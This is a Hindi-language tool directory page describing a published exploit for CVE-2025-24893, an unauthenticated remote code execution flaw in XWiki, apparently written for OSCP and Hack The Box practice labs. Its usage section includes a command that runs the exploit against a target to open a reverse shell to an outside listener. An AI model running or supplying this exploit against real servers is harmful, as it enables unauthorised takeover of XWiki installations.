Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24893 — OSCP like CVE-2025-24893 exploit for Linux XWiki | Kitploit
उपकरण/GitHubGitHub/vasilysaint/cve-2025-24893
ExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access ToolLabs & Practice
GitHubvasilysaint/cve-2025-24893

CVE-2025-24893

OSCP like CVE-2025-24893 exploit for Linux XWiki

रिपॉजिटरी देखें
12 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24893

XWiki Platform एक सामान्य विकि प्लेटफ़ॉर्म है जो इसके ऊपर बनाए गए अनुप्रयोगों के लिए रनटाइम सेवाएँ प्रदान करता है। SolrSearch एंडपॉइंट में एक कमज़ोरी के कारण, एक अप्रमाणित उपयोगकर्ता मनमाना दूरस्थ कोड निष्पादन प्राप्त कर सकता है। यह कमज़ोरी संपूर्ण XWiki इंस्टॉलेशन की गोपनीयता, अखंडता और उपलब्धता को प्रभावित करती है।

CVE: CVE-2025-24893


डेमो

एक्सप्लॉइट का प्रदर्शन नीचे दिखाया गया है:

Terminal Demo

उपयोग

इस एक्सप्लॉइट का उपयोग करने के लिए, इन चरणों का पालन करें:

  1. रिपॉजिटरी को क्लोन करें: git clone https://github.com/yourusername/CVE-2025-24893.git
  2. क्लोन की गई निर्देशिका पर जाएँ: cd CVE-2025-24893
  3. आवश्यक निर्भरताएँ स्थापित करें: pip install requests
  4. एक्सप्लॉइट चलाएँ:
root@kitploit:~
./CVE-2025-24893_linux-xwiki-exploit.py  -t http(s)://[target]:(port) -l [Listener IP] -p [Listener PORT] [-hp [Local HTTP PORT]]

इस एक्सप्लॉइट के बारे में

यह एक्सप्लॉइट CVE-2025-24893 में वर्णित दूरस्थ कोड निष्पादन कमज़ोरी को प्रदर्शित करता है और एक अप्रमाणित उपयोगकर्ता को कमज़ोर Linux-आधारित XWiki इंस्टॉलेशन पर एक रिवर्स शेल प्राप्त करने की अनुमति देता है।

मैंने मूल रूप से इस उपकरण को प्रशिक्षण वातावरणों जैसे OSCP तैयारी प्रयोगशालाओं और Hack The Box में उपयोग के लिए विकसित किया था, जहाँ मैं कमज़ोरी को पुन: उत्पन्न करने का एक सरल और विश्वसनीय तरीका चाहता था। चूँकि कोई मौजूदा उपकरण मेरी आवश्यकताओं को पूरा नहीं करता था, मैंने एक बनाने का निर्णय लिया।

हालाँकि CVE-2025-24893 को समर्थित XWiki रिलीज़ में बहुत पहले पैच कर दिया गया है, इस एक्सप्लॉइट का उपयोग केवल उन सिस्टमों के विरुद्ध किया जाना चाहिए जिनके आप मालिक हैं या जिनका परीक्षण करने के लिए आप स्पष्ट रूप से अधिकृत हैं।

लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग या इसके उपयोग से होने वाली किसी भी क्षति के लिए कोई जिम्मेदारी नहीं लेता है।

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा मूल्यांकनों के लिए है।

इसका उपयोग केवल उन सिस्टमों के विरुद्ध करें जिनके आप मालिक हैं या जिनका परीक्षण करने के लिए आप स्पष्ट रूप से अधिकृत हैं। लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग या इसके उपयोग से होने वाली किसी भी क्षति के लिए कोई दायित्व नहीं मानता है।

योगदान

योगदान का स्वागत है।

यदि आप बग का सामना करते हैं, सुधार के लिए सुझाव हैं, या अतिरिक्त पेलोड, प्लेटफ़ॉर्म या सुविधाओं के लिए समर्थन जोड़ना चाहते हैं, तो बेझिझक एक इश्यू खोलें या पुल रिक्वेस्ट सबमिट करें।

रचनात्मक प्रतिक्रिया, परीक्षण रिपोर्ट और कोड योगदान की बहुत सराहना की जाती है।

टूल डाउनलोड करें